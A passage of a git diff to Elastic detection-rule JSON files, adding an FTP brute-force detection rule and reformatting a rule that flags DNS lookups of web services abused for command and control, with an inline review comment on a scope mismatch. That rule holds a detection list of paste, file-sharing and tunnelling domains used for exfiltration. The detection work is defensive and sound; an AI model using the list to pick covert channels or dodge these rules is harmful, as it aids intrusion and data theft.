daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n```\nFor this detection rule no additional audit rules are required to be added to the integration. \n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "sequence by host.id, auditd.data.addr, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal == \"ftp\" and event.outcome == \"failure\" and \n auditd.data.addr != null and auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal == \"ftp\" and event.outcome == \"success\" and \n auditd.data.addr != null and auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] | tail 1\n", "related_integrations": [ { 
@@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n```\nFor this detection rule no additional audit rules are required to be added to the integration.\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. 
The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n```\nFor this detection rule no additional audit rules are required to be added to the integration.\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_2.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_2.json index 4b53ff1b9b5..0e02c932945 100644 --- a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_2.json +++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_2.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_3.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_3.json index 427f5c8cf22..7cf0d5f95ad 100644 
--- a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_3.json
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_4.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_4.json
index 4465d813553..ccf41e457e8 100644
--- a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_4.json
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_5.json b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_5.json
new file mode 100644
index 00000000000..ad5b51c0050
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_5.json
@@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An FTP (file transfer protocol) brute force attack is a method where an attacker systematically tries different combinations of usernames and passwords to gain unauthorized access to an FTP server, and if successful, the impact can include unauthorized data access, manipulation, or theft, compromising the security and integrity of the server and potentially exposing sensitive information. This rule identifies multiple consecutive authentication failures targeting a specific user account from the same source address and within a short time interval, followed by a successful authentication.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful Linux FTP Brute Force Attack Detected", + "query": "sequence by host.id, auditd.data.addr, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal == \"ftp\" and event.outcome == \"failure\" and \n auditd.data.addr != null and auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \n event.action == \"authenticated\" and auditd.data.terminal == \"ftp\" and event.outcome == \"success\" and \n auditd.data.addr != null and auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] | tail 1\n", + "related_integrations": [ + { + "integration": "auditd", + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.addr", + "type": "keyword" + }, + { + "ecs": false, + "name": "auditd.data.terminal", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "related.user", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": 
"T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "66712812-e7f2-4a1d-bbda-dd0b5cf20c5d_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_104.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_104.json index 5bdc882061c..fc2fe74bc4e 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_104.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_104.json 
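Review bot: In the new 66712812-…_5.json the `index` list adds `"auditbeat-*"` and the new `setup` text presents Auditbeat as a supported data source, yet both sequence steps in `query` hard-filter `event.dataset == "auditd_manager.auditd"`, so Auditbeat documents would only match if they carried that exact dataset value, which I would not expect them to. `related_integrations` lists only the `auditd_manager` package, which agrees with the query rather than with the setup text, so one of the two is misleading operators about coverage. Either remove `"auditbeat-*",` from `index` and the "### Auditbeat Setup" section from `setup`, or widen the `event.dataset` clause to the dataset value Auditbeat actually emits after confirming it against real Auditbeat data. A short comment-equivalent for the rule, e.g. in `setup`: "Note: the query currently matches only documents with `event.dataset: auditd_manager.auditd`", would make the intended scope explicit until that is resolved.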
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", - "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. 
Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. 
Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n 
\"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not process.executable :\n (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Discord\\\\app-*\\\\Discord.exe\"\n )\n", "related_integrations": [ { @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_105.json b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_105.json index 7fdb278b0d8..325c7747c2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_105.json +++ b/packages/security_detection_engine/kibana/security_rule/66883649-f908-4a5b-a1e0-54090a1d3a32_105.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Web Services", - "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can be abused for exfiltration or command and control.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy false positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\",\n \"script.google.com\",\n \"script.googleusercontent.com\"\n ) and\n /* Insert noisy false positives here */\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n 
